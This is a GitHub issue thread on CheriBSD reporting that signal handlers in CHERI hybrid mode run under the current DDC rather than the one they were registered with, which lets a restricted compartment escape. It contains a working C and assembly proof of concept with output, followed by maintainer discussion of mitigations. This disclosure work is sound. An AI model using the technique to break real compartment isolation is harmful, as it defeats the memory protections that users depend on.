Signal handlers in hybrid mode can be used to bypass the DDC

ltratt commented 2 years ago

[This report was done in conjunction with @0152la and @jacobbramley]

In CheriBSD hybrid mode (presumably a variant of this can also happen in purecap mode, but I haven’t checked that), signal handlers can be used by a nefarious compartment to get access to a different DDC than it was registered with.

The following code shows the problem (much of this is boilerplate; restrict_and_check() is the main part of interest):

#include <cheriintrin.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#if defined(__CHERI_PURE_CAPABILITY__) ||!__has_feature(capabilities)
#  error This example must be run on a CHERI hybrid system
#endif

// This example shows that registering a signal handler allows a DDC-restricted
// compartment to break out of itself: the signal handler is run with whatever
// DDC is present at the time the handler is run, which can be different than
// the DDC the handler was registered with.

#define STACK_LEN 4096

void ddc_set(void *__capability cap) {
    asm volatile("MSR DDC, %[cap]" : : [cap] "C"(cap) : "memory");
}

void handler(int sig) {
    printf("DDC in signal handler: %#lp\n", cheri_ddc_get());
}

void restrict_and_check() {
    pid_t self_pid = getpid();

    void *__capability old_ddc = cheri_ddc_get();
    // The new DDC's bounds will be `0..__builtin_frame_address(0)`.
    void *__capability new_ddc = cheri_bounds_set(cheri_ddc_get(), (vaddr_t) __builtin_frame_address(0));
    printf("Will restrict DDC to: %#lp\n", new_ddc);
    // Restrict the DDC (i.e. move into a restricted compartment).
    ddc_set(new_ddc);
    // Register a signal handler while in the restricted compartment.
    signal(SIGHUP, handler);
    // If a signal is received now, the handler will be run under the restricted DDC...
    kill(self_pid, SIGHUP);
    // ...but if we now restore the DDC to its unrestricted value...
    ddc_set(old_ddc);
    // ...then the handler will be run with the unrestricted DDC, breaking out
    // of the compartment the handler was registered under.
    kill(self_pid, SIGHUP);
}

void call_with_stack(void (*fn)(), void* stack);
asm(".type call_with_stack, @function\n"
    "call_with_stack:\n"
    "    MOV x10, sp\n"
    "    BIC sp, x1, 0xf\n" // Ensure 16-byte stack alignment.
    // Save the return address and old stack, so we can get back.
    "    STP x10, lr, [sp, #-16]!\n"
    // We've now switched to a new stack. We must restore it before the end
    // of the assembly block, because the C compiler is likely to generate
    // stack accesses to access locals. We can, however, call out to another
    // C function, since it shouldn't make any assumptions about its stack
    // on entry and will work in blissful ignorance that it's not on the
    // same stack as the calling function.
    //
    // We've broken an AAPCS64 rule here because we've escaped the stack
    // limit, but in practice this works fine for demonstration purposes.
    "    BLR x0\n"
    // Restore the stack and return.
    "    LDP x10, lr, [sp]\n"
    "    MOV sp, x10\n"
    "    RET lr\n");

int main() {
    // The default DDC in CheriBSD spans the entirety of virtual memory, and it
    // puts the stack at such a high virtual address that it's difficult to
    // restrict the DDC and still ensure the program has access to whatever
    // chunk of memory library calls like signal will need and the stack. To
    // make our lives easier we allocate a new stack, which CheriBSD will place
    // at a relatively low virtual memory address, and restrict the DDC to
    // encompass virtual memory up to that address
    void *new_stack = malloc(STACK_LEN) + STACK_LEN;
    call_with_stack(restrict_and_check, new_stack);

    return 0;
}

When run this prints out:

Will restrict DDC to: 0x0 [rwRW,0x0-0x41800000]
DDC in signal handler: 0x0 [rwRW,0x0-0x41800000]
DDC in signal handler: 0x0 [rwRW,0x0-0x1000000000000]

As this shows, the first invocation of the signal handler is executed with the restricted DDC, and the second invocation with the unrestricted DDC. In essence, the signal handler has allowed the restricted compartment access to the unrestricted compartment. Using more general terminology, a signal handler can be used to gain access to a different set of permissions to that in play when the handler was registered.

The “obvious” fix is that registering a signal handler with signal() should record the DDC at registration time and restore that before the kernel invokes the signal handler. However, each DDC compartment will have its own stack, and no ABI I know of allows a user-space DDC compartment to record the stack at the point that the DDC value is changed. Thus, switching the DDC cannot be guaranteed to restore the stack pointer to the correct place. Changing the ABI to record the stack pointer on a DDC-switch would be very difficult and is probably impractical (if nothing else, how would the user atomically change the DDC and record the stack pointer?).

One approach is to only deliver signals to a thread if its current DDC is the same as when the signal was registered. I’m not keen on this: signals may end up never being delivered, which will cause a debugging nightmare.

Fortunately I think we can make use of the existing sigaltstack() call, which allows a process to designate a given portion of memory as being the stack for signal calls. As well as recording the DDC at the point that a signal handler is registered, signal() should abort (probably returning SIG_ERR and the seemingly generic EINVAL in errno?) if an alternative signal stack has not been registered. Clearly this is not fully compatible with existing code which rarely calls sigaltstack(). One could safely loosen the restriction so that if the DDC at the point signal() is called the “default” DDC no alternative signal stack needs to have been recorded.

[Although I don’t think the following is directly related, in the sense that there’s nothing OS libraries or the kernel can do about it, it’s worth noting. Signal handlers are not deleted when a DDC compartment is removed, so they could be used for when a new DDC compartment happens to overlap in virtual memory with an old DDC compartment. A “good” DDC compartment manager thus will, in general, need to delete signal handlers that reside within a given DDC compartment when that compartment is deleted.]

jrtc27 commented 2 years ago

Our general belief is that compartments cannot safely be given raw access to system calls, and so any signal configuration must be interposed given it's a shared process-wide resource, with the interposing code being a trusted intermediary, and thus can run with the full DDC (and, in the case of Morello, executive, but none of CheriBSD is designed to support the Morello-specific restricted mode currently, we make zero security claims, or even functionality ones, beyond it not being a side-channel between processes). There is no way that I know of to safely and robustly do it otherwise.

Also you need an alternate signal stack anyway if you want safety, otherwise compartments can poke at earlier stack frames to extract capabilities to other compartments.

jacobbramley commented 2 years ago

Ah-ha, and it looks like we can use CHERI_PERM_SYSCALL to experiment with that in CheriBSD.

I think a distinct stack region is usually required for the same reason that it is required when switching compartments in general. sigaltstack() is a good way to get the kernel to go along with whatever stack policy the compartments rely upon. Here's a thought, though: you could use the same stack region but give a bounded stack pointer to enforce separation. It would require cleaning of memory on entry and exit but could act as a fallback for compatibility with code that doesn't use sigaltstack(). This could probably be used as a deployment path, at least.

rwatson commented 2 years ago

I’m not sure if you’ve looked at our 2015 paper on in-process compartmentalisation, but it touches on some of these topics -- and our implementation at the time had rather more to say about signal stacks, etc.

https://www.cl.cam.ac.uk/research/security/ctsrd/pdfs/201505-oakland2015-cheri-compartmentalization.pdf

Since then we’ve been primarily focused on co-process compartmentalisation, which doesn’t require detailing fine-grained compartmentalisation within processes. But we also have ongoing work on a run-time-linker-based model that is turning our attention back to that general investigation.

ltratt commented 2 years ago

@jacobbramley

Here's a thought, though: you could use the same stack region but give a bounded stack pointer to enforce separation.

I think this would end up functionally equivalent to the compartment manager/creater code calling sigaltstack when a compartment is created?

@rwatson

But we also have ongoing work on a run-time-linker-based model that is turning our attention back to that general investigation.

Is there anything you can point us at? We're all ears :)

CTSRD-CHERI / cheribsd

Signal handlers in hybrid mode can be used to bypass the DDC #1315